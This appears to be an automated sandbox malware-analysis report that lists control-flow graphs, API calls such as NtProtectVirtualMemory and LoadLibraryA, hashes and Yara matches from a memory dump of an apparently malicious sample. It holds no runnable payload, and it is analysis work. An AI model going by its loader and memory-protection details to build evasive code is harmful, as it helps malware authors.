1510 571e40-571e54 1505->1510 1506->1485 1511 573569-57356d 1506->1511 1509->1505 1515 571865-571892 1509->1515 1513 571e58-571e6d 1510->1513 1511->1485 1516 573573-573581 1511->1516 1518 571e73-571eac 1513->1518 1519 572172-572187 1513->1519 1515->1505 1521 571894-5718aa 1515->1521 1516->1485 1522 573587-5735e8 1516->1522 1518->1513 1525 571eae-571ec5 1518->1525 1519->1406 1528 57218d-57218e 1519->1528 1521->1505 1527 5718ac-571920 1521->1527 1535 5735e9-5735fd 1522->1535 1525->1513 1531 571ec7-571f29 1525->1531 1538 571922-57199c 1527->1538 1534 572192-5721a1 1528->1534 1531->1513 1547 571f2f-571f46 1531->1547 1539 5721a7-572219 1534->1539 1540 5723b6-5723dd call 5723e2 1534->1540 1541 573672-573689 1535->1541 1542 5735ff-573603 1535->1542 1556 5719a2-5719e7 1538->1556 1557 571a39-571a4c 1538->1557 1539->1406 1551 57221f-57222a 1539->1551 1541->1458 1545 57368f-5736b2 1541->1545 1542->1485 1543 573609-573615 1542->1543 1543->1458 1552 57361b-573669 1543->1552 1547->1406 1554 571f4c-571fb8 1547->1554 1551->1534 1559 572230-572244 1551->1559 1552->1535 1568 571fbd-571fd1 1554->1568 1558 571a69-571a79 1556->1558 1557->1558 1560 571a4e-571a68 1557->1560 1566 571a7f-571a96 1558->1566 1567 571c2d-571c44 1558->1567 1559->1534 1565 57224a-57227e 1559->1565 1560->1558 1565->1534 1572 572284-5722f0 1565->1572 1566->1567 1573 571a9c-571b0e 1566->1573 1574 571d64-571da8 1567->1574 1575 571c4a-571cd0 1567->1575 1569 5720a7-5720e0 1568->1569 1570 571fd7-571ff1 1568->1570 1569->1568 1582 5720e6-57216c call 5723e2 1569->1582 1576 571ff3-57200a 1570->1576 1577 57201c-572084 1570->1577 1588 5722f5-57230e 1572->1588 1589 571b0f-571b3f 1573->1589 1574->1538 1579 571dae-571dec call 5723e2 1574->1579 1575->1574 1591 571cd6-571d61 1575->1591 1576->1458 1584 572010-57201a 1576->1584 1577->1569 1579->1478 1584->1577 1593 572088-5720a6 1584->1593 1595 572310-57237a 1588->1595 1596 57237b-5723ae 1588->1596 1589->1589 1597 571b41-571bdb 1589->1597 1591->1574 1593->1569 1595->1596 1596->1588 1602 5723b4 1596->1602 1597->1589 1607 571be1-571c20 1597->1607 1599->1415 1606 56b08f-56b1e5 call 572acd 1599->1606 1602->1540 1606->1458 1613 56b1eb-56b20b 1606->1613 1607->1589 1609 571c26-571c2a 1607->1609 1609->1567 1613->1492 1614 56b211-56b3f2 call 56b2fb 1613->1614 1614->1406 1620 56b3f8-56b554 call 572acd 1614->1620 1620->1492 1625 56b55a-56b597 1620->1625 1625->1492 1626 56b59d-56b604 1625->1626 1628 56b606-56b63b 1626->1628 1629 56b641-56b64a 1626->1629 1628->1492 1628->1629 1629->1420 1630 56b650-56b66e 1629->1630 1630->1492 1631 56b674-56b68f 1630->1631 1631->1420 1632 56b695-56b8b7 call 56f944 1631->1632 1632->1492 1638 56b8bd-56b9ea call 57374d 1632->1638 1638->1492 1644 56b9f0-56baba call 572acd 1638->1644 1644->1492 1648 56bac0-56bb82 call 572acd 1644->1648 1648->1492 1652 56bb84-56bbde 1648->1652 1652->1436 1654 56bbe4-56bbfd call 572acd 1652->1654
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: EK]
                                                                                                                          • API String ID: 0-1532622298
                                                                                                                          • Opcode ID: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
                                                                                                                          • Instruction ID: 7f2c824bc979e4107e2b7bf8adf9b110f1ab5535bc9a2088fec85385654fbe56
                                                                                                                          • Opcode Fuzzy Hash: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
                                                                                                                          • Instruction Fuzzy Hash: AE61AC71A003499FDF359E7489A43DB3BA6FF963A0F65492ADC46CB701D7318986C701
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1657 56ffed-56fff4 call 570391 1660 56fffa-57008e 1657->1660 1662 570090-57013c call 5702dc 1660->1662 1666 57013e-57014a 1662->1666 1667 57014c-5701d8 1662->1667 1666->1667 1667->1662 1669 5701de-5701ea 1667->1669 1669->1660 1670 5701f0-570231 1669->1670 1671 570237-570243 1670->1671 1672 56f3ee-56f4b1 1670->1672 1671->1660 1673 570249-570280 1671->1673 1676 56f4e4-56f53d LoadLibraryA call 56f542 1672->1676 1677 56f4b3-56f4e1 call 56fcc1 call 56f542 1672->1677 1673->1660 1675 570286-5702d8 1673->1675 1677->1676
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `
                                                                                                                          • API String ID: 0-1850852036
                                                                                                                          • Opcode ID: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
                                                                                                                          • Instruction ID: f0051739ee9f5ead7fa6c460bb19291342acc587674e0e2bcc116909637407d5
                                                                                                                          • Opcode Fuzzy Hash: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
                                                                                                                          • Instruction Fuzzy Hash: ED516B76A0035ADBCF345E299E683DA37A2FFE13A0FDA402ACC4E97201C7304985D741
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1686 563ce1-563cef 1687 563d31-563d36 1686->1687 1688 563d0f-563d10 1687->1688 1689 563d38-563d3e 1687->1689 1691 563d2f-563d30 1688->1691 1690 563d40-563d56 1689->1690 1692 563daf-563db3 NtProtectVirtualMemory 1690->1692 1693 563d58-563d5d 1690->1693 1691->1687 1694 563cfe-563d00 1691->1694 1698 563dbb 1692->1698 1693->1691 1695 563d5f-563d98 1693->1695 1696 563d02 1694->1696 1697 563c9f-563cab 1694->1697 1695->1698 1704 563d9a-563d9f 1695->1704 1696->1688 1697->1686 1698->1690 1700 563dbd-563e46 1698->1700 1705 563e48-563ef0 1700->1705 1706 563da2-563dae 1704->1706 1707 563da1 1704->1707 1710 563ef6-563f28 1705->1710 1706->1692 1707->1706
                                                                                                                          APIs
                                                                                                                          • NtProtectVirtualMemory.NTDLL ref: 00563DAF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2706961497-0
                                                                                                                          • Opcode ID: 3bfab089e0a8e921a3d477f1633c910392c34ba205763c3e8f51b3710357ae60
                                                                                                                          • Instruction ID: 815a7e42fffba584ecc8aa1ab58a73cedfe24da399ac82aa319bdbcc8ef843ff
                                                                                                                          • Opcode Fuzzy Hash: 3bfab089e0a8e921a3d477f1633c910392c34ba205763c3e8f51b3710357ae60
                                                                                                                          • Instruction Fuzzy Hash: 8041CC715083828FDB159E3489683EA3FD5AF613A0F694B6EC866CB5D2C7368903C701
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1812 563e0e-563e10 1813 563e12-563e46 1812->1813 1814 563daf-563db3 NtProtectVirtualMemory 1812->1814 1815 563e48-563ef0 1813->1815 1816 563dbb 1814->1816 1820 563ef6-563f28 1815->1820 1818 563d40-563d56 1816->1818 1819 563dbd-563dd0 1816->1819 1818->1814 1821 563d58-563d5d 1818->1821 1819->1813 1822 563d2f-563d30 1821->1822 1823 563d5f-563d98 1821->1823 1824 563d31-563d36 1822->1824 1825 563cfe-563d00 1822->1825 1823->1816 1834 563d9a-563d9f 1823->1834 1829 563d0f-563d10 1824->1829 1830 563d38-563d3e 1824->1830 1827 563d02 1825->1827 1828 563c9f-563cef 1825->1828 1827->1829 1828->1824 1829->1822 1830->1818 1835 563da2-563dae 1834->1835 1836 563da1 1834->1836 1835->1814 1836->1835
                                                                                                                          APIs
                                                                                                                          • NtProtectVirtualMemory.NTDLL ref: 00563DAF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2706961497-0
                                                                                                                          • Opcode ID: 5a26d430a2d090a820bf4f5314116ffd24961de1c209c8b2da92f1e55e77e4ed
                                                                                                                          • Instruction ID: 23d7aa219f351d074db8552830d230c8a808649600816b93fb4f1542e1a3ca84
                                                                                                                          • Opcode Fuzzy Hash: 5a26d430a2d090a820bf4f5314116ffd24961de1c209c8b2da92f1e55e77e4ed
                                                                                                                          • Instruction Fuzzy Hash: 7811C5620187825ED725ED3445683E66FC65F62360F598B4ECCA59B8D2C63785438101
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1850 5723e2-5724f9 NtProtectVirtualMemory
                                                                                                                          APIs
                                                                                                                          • NtProtectVirtualMemory.NTDLL(-11417B1E,?,?,?,?,005715C1,12BC0BD0,0056A728), ref: 005724F5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2706961497-0
                                                                                                                          • Opcode ID: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
                                                                                                                          • Instruction ID: 7bec9491bcebd8e26602e5db64857fecd65b64fe27260b38cb10d9b195377669
                                                                                                                          • Opcode Fuzzy Hash: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
                                                                                                                          • Instruction Fuzzy Hash: 790171746043558FDF30CE68C8D87DA7695FB8D700F81412AAD4D5B305C6715E89CB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: f88a15a8b549e602bf36b54097d62ed37fa2be16488972c08f21721efb5d0571
                                                                                                                          • Instruction ID: d1a63a4ca8cf21e01ce5e6a3a8e63db0b62585849bbdf859f1ae7fa51080ded6
                                                                                                                          • Opcode Fuzzy Hash: f88a15a8b549e602bf36b54097d62ed37fa2be16488972c08f21721efb5d0571
                                                                                                                          • Instruction Fuzzy Hash: D790027120140402D7407959550474A40054BD0741FA5C515B5054514EC6698DD5B669
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: ae4be738cd3910a03fd95d03a8d03b3098d20d1968e45910eb81049c5d823e69
                                                                                                                          • Instruction ID: 6528c96b80e366bfd9460b71e1072a89105fc5dd7af34d20e511e39d3bb6d870
                                                                                                                          • Opcode Fuzzy Hash: ae4be738cd3910a03fd95d03a8d03b3098d20d1968e45910eb81049c5d823e69
                                                                                                                          • Instruction Fuzzy Hash: 1990023120140413D7117959560470B40094BD0681FE5C916B0414518DD6668952F125
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1858 1ea32b90-1ea32b9c LdrInitializeThunk
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: a360d96f21b57994ded62af8644020a818903be43403c30f0a8b1111d2b2eaea
                                                                                                                          • Instruction ID: cf46642fe4777423fd7aafb97d7665a467a0ac5905cedfa9f18c9101c3727479
                                                                                                                          • Opcode Fuzzy Hash: a360d96f21b57994ded62af8644020a818903be43403c30f0a8b1111d2b2eaea
                                                                                                                          • Instruction Fuzzy Hash: FF90023120148802D7107959950474E40054BD0741FA9C915B4414618DC6A58891B125
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1857 1ea32b10-1ea32b1c LdrInitializeThunk
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 2d11c3e9e27534957cdbfa3c8425ddfaa63912303f84e06a875a8c8c7824ab7d
                                                                                                                          • Instruction ID: 5ea7dda7bf9e6200b6e0e02bb769a152c47f659473f90a78cc525dfaedd269ee
                                                                                                                          • Opcode Fuzzy Hash: 2d11c3e9e27534957cdbfa3c8425ddfaa63912303f84e06a875a8c8c7824ab7d
                                                                                                                          • Instruction Fuzzy Hash: 8D90023120140802D7807959550464E40054BD1741FE5C519B0015614DCA258A59B7A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: f40ea8f2dbb7950573ab5a8f29ccc9d65ce47197af82d4132493a3d6e7221373
                                                                                                                          • Instruction ID: 0eca4b3383abac04f1b2dbff8fa2e6bf6d4acbdd754aca79ae560a04c27f667a
                                                                                                                          • Opcode Fuzzy Hash: f40ea8f2dbb7950573ab5a8f29ccc9d65ce47197af82d4132493a3d6e7221373
                                                                                                                          • Instruction Fuzzy Hash: 2C90023160550402D7007959561470A50054BD0641FB5C915B0414528DC7A58951B5A6
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1712 56bf1c-56bfcc call 56bf5c 1717 56bfd2-56c025 call 56c88b call 56ebec 1712->1717 1718 56f3ee-56f4b1 1712->1718 1733 56e546-56e54c call 56c02c 1717->1733 1734 56e518 1717->1734 1722 56f4e4-56f53d LoadLibraryA call 56f542 1718->1722 1723 56f4b3-56f4e1 call 56fcc1 call 56f542 1718->1723 1723->1722 1738 56e553 1733->1738 1734->1738 1739 56e555 1738->1739 1740 56e51e-56e520 1738->1740 1739->1734 1741 56e522 1740->1741 1742 56e4bf-56e4c0 1740->1742 1741->1733 1743 56e4a2 1742->1743 1744 56e4c2-56e4c4 1742->1744 1747 56e4a9-56e4ae 1743->1747 1745 56e4c6 1744->1745 1746 56e463 1744->1746 1748 56e4f0-56e509 call 56c7b8 1745->1748 1746->1747 1747->1748 1748->1734
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
                                                                                                                          • Instruction ID: 28afd958650d09b80608952a58c141fa42a07a02f2b2a8f8e81f643da00c4e30
                                                                                                                          • Opcode Fuzzy Hash: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
                                                                                                                          • Instruction Fuzzy Hash: 8641773560531A9FCF309E285CE53DB2B61BFA53B0FA0072BDC56DB191DB318D458602
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1751 56be04-56bea8 call 56c88b 1756 56f3ee-56f4b1 1751->1756 1757 56beae-56c025 call 56bede call 56ebec 1751->1757 1760 56f4e4-56f53d LoadLibraryA call 56f542 1756->1760 1761 56f4b3-56f4e1 call 56fcc1 call 56f542 1756->1761 1774 56e546-56e54c call 56c02c 1757->1774 1775 56e518 1757->1775 1761->1760 1778 56e553 1774->1778 1775->1778 1779 56e555 1778->1779 1780 56e51e-56e520 1778->1780 1779->1775 1781 56e522 1780->1781 1782 56e4bf-56e4c0 1780->1782 1781->1774 1783 56e4a2 1782->1783 1784 56e4c2-56e4c4 1782->1784 1787 56e4a9-56e4ae 1783->1787 1785 56e4c6 1784->1785 1786 56e463 1784->1786 1788 56e4f0-56e509 call 56c7b8 1785->1788 1786->1787 1787->1788 1788->1775
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
                                                                                                                          • Instruction ID: 0327d574dbc4f0800ebe1b61ab5bdd207f1a4cf2d3da7fc7c8c06abba19ec839
                                                                                                                          • Opcode Fuzzy Hash: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
                                                                                                                          • Instruction Fuzzy Hash: F4319B75A0035ADBDF302F245CA43EE2B6ABF947A0F61052FEC469B241D7318D808742
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1791 56c02c-56c114 call 56c0b3 call 56c88b call 56ebec 1800 56f3ee-56f4b1 1791->1800 1801 56c11a-56c11b 1791->1801 1803 56f4e4-56f53d LoadLibraryA call 56f542 1800->1803 1804 56f4b3-56f4e1 call 56fcc1 call 56f542 1800->1804 1804->1803
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
                                                                                                                          • Instruction ID: 49f2a915e24d8e0c3b808ffb7c77f2a8db2218cc0f56602be14b26dd76b22581
                                                                                                                          • Opcode Fuzzy Hash: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
                                                                                                                          • Instruction Fuzzy Hash: 26319B72A003099BCF30AE2958583DE2B77BFE43A0FBA8427EC49DB201C7318D468751
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1839 56f3ee-56f4b1 1841 56f4e4-56f53d LoadLibraryA call 56f542 1839->1841 1842 56f4b3-56f4e1 call 56fcc1 call 56f542 1839->1842 1842->1841
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
                                                                                                                          • Instruction ID: 6c20cb82a3ff77e6cd48d1178652c92269bc3356b48ccfc60a8d6d5ff6766eed
                                                                                                                          • Opcode Fuzzy Hash: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
                                                                                                                          • Instruction Fuzzy Hash: 55116B71A0132A9BCF306F2969A83CB2776BFD8790FA5442BEC4ADB201DB718D418751
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1853 1ea32b2a-1ea32b2f 1854 1ea32b31-1ea32b38 1853->1854 1855 1ea32b3f-1ea32b46 LdrInitializeThunk 1853->1855
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 2570467057a79bc12d0765746316a09c94fa6705002ec3fe5efd476d5683f7e4
                                                                                                                          • Instruction ID: 18ef1af86ee5b66950ad55bbcb9853c89887fa815b40a290894ea05da423a84c
                                                                                                                          • Opcode Fuzzy Hash: 2570467057a79bc12d0765746316a09c94fa6705002ec3fe5efd476d5683f7e4
                                                                                                                          • Instruction Fuzzy Hash: F3B09B719014C5C5D711EF60570870B79056BD0B41F75C555F2460641E4738C491F179
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                          • API String ID: 3446177414-1700792311
                                                                                                                          • Opcode ID: 5bb7f2c7eed1b9034766ca1e6b6554d20e58dcd34ba6423290f62e3205e3a3a6
                                                                                                                          • Instruction ID: 24b0c523542aea7bf51c8e34e3fd10a2c8acb2ba428e1438a0ca175346357789
                                                                                                                          • Opcode Fuzzy Hash: 5bb7f2c7eed1b9034766ca1e6b6554d20e58dcd34ba6423290f62e3205e3a3a6
                                                                                                                          • Instruction Fuzzy Hash: 21D10F39900785DFCB02CFA8C490AAABBF2FF89314F05865DE645AB612D735A941CB58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                          • API String ID: 0-4253913091
                                                                                                                          • Opcode ID: 26982e91f3027784a1974d71ac6240fe61a758aa084a9108eb4bc8d7d014df61
